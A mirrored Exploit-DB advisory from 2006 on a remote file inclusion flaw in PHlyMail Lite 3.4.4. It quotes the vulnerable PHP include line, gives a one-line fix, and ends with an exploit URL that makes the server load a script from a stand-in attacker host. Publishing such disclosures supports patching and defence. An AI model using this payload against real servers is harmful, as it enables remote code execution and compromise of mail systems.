- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2211
- Проверка EDB
-
- Пройдено
- Автор
- KACPER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4291
- Дата публикации
- 2006-08-18
Код:
/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- PHlyMail Lite <= 3.4.4 (Build 3.04.04) [_PM_[path][handler]] Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: PHlyMail Lite v. 3.4.4 (Build 3.04.04)
- [Script site: http://phlymail.de/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Find by: Kacper (a.k.a Rahim)
+
- Contact: [email protected]
- or
- http://www.devilteam.yum.pl/
- and
- http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne kozysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Z Dedykacja dla osoby,
- bez ktorej nie mogl bym zyc...
- K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*
+++++++++++++++++++++START+++++++++++++++++++++++
vulnerable code => handlers/email/mod.listmail.php line 12-25:
....
$use_preview = (isset($_PM_['core']['folders_usepreview']) && $_PM_['core']['folders_usepreview']) ? true : false;
$ordfields = array
('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv', 'hdate_sent', 'hsize', 'hpriority'
,'attachments', 'meta_read', 'meta_type', 'meta_colour'
);
require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php');
require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php');
// We changed the folder, got to reset the page number to 0
if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder'])
&& $_REQUEST['workfolder'] != $_SESSION['workfolder']) {
$_SESSION['WPs_pagenum'] = 0;
}
....
+++++++++++++++++++++++++++++++++++++++++++++++++
*/
/*
+++++++++++++++++++++FIX+++++++++++++++++++++++++
handlers/email/mod.listmail.php line 12-25:
Add Line1:
....
if (!defined('_IN_PHM_')) die();
....
$use_preview = (isset($_PM_['core']['folders_usepreview']) &&
$_PM_['core']['folders_usepreview']) ? true : false;
$ordfields = array
('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv', 'hdate_sent', 'hsize', 'hpriority'
,'attachments', 'meta_read', 'meta_type', 'meta_colour'
);
require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php');
require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php');
// We changed the folder, got to reset the page number to 0
if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder'])
&& $_REQUEST['workfolder'] != $_SESSION['workfolder']) {
$_SESSION['WPs_pagenum'] = 0;
}
....
++++++++++++++++++++THE+END++++++++++++++++++++++
*/
#Exploit:
http://www.site.com/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt]
# milw0rm.com [2006-08-18]
- Источник
- www.exploit-db.com